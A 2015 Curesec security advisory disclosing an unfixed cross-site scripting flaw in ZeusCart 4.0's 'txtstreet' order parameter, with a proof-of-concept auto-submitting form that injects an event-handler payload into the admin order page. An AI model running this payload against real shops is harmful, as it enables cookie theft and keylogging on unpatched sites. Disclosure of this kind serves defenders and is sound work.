ZeusCart 4.0: XSS

ZeusCart 4.0: XSS

Date: 2015-09-14 10:58:45
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: ZeusCart 4.0
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Contact: support@zeuscart.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 08/13/2015
Disclosed to public: 09/14/2015
Release mode: Full Disclosure
CVE: n/a
Credits Tim Coen of curesec GmbH

2. Vulnerability Description

There is an XSS vulnerability via the "txtstreet" POST parameter when adding a new order. With this, it is possible to steal cookies or inject JavaScript keyloggers.

2. Proof of Concept

<form name="myform" method="post" action="http://localhost/zeuscart-master/admin/index.php?do=addUserOrder&action=create" > <input type="hidden" name="hidOrderTotal" value="400"> <input type="hidden" name="discount" value="flat"> <input type="hidden" name="selCustomer" value="1"> <input type="hidden" name="payOption" value="8"> <input type="hidden" name="txtname" value="Primary"> <input type="hidden" name="txtstreet" value="foo autofocus onfocus=alert(1); bar"> </form> <script>document.myform.submit();</script>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

08/13/2015 Informed Vendor about Issue (no reply)
09/07/2015 Reminded Vendor of release date (no reply)
09/14/2015 Disclosed to public